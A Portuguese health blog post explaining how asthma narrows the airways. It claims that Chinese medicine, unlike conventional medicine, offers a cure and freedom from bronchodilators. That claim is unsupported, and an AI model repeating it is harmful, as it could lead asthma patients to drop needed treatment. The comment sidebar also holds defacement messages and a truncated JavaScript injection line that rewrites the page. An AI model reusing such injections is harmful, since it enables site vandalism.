saudeyinyang @ 12:39

Sex, 01/07/11

Na prática não se consegue respirar porque os canais respiratórios que conduzem o ar (da traqueia até aos pulmões), estão congestionados por edema inflamatório (os "tubos" incham para dentro diminuindo o calibre), e contraem-se (tem músculos) apertando tanto que se pode morrer de falta de ar.

 

Quem já viu uma crise de asma daquelas que não cede imediatamente aos broncodilatadores, tem a noção do grande sofrimento, físico e psicológico de quem sofre de asma. E pior que se pode morrer de uma crise (felizmente cada vez menos graças ao avanço da medicina).

 

A esperança da maioria dos asmáticos à luz da Medicina convencional é ter asma para o resto da vida. Enquanto a medicina chinesa levanta a esperança de cura.

Deixar de ter crises e deixar de precisar de broncodilatadores é o objectivo que propõem a Medicina Chinesa ao doente asmático.

 

Na próxima crónica Yin e Yang vamos falar de como tratar a asma pela acupunctura e ervas chinesas e vamos entender o que é a asma em critérios da "Medicina das Energias".

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO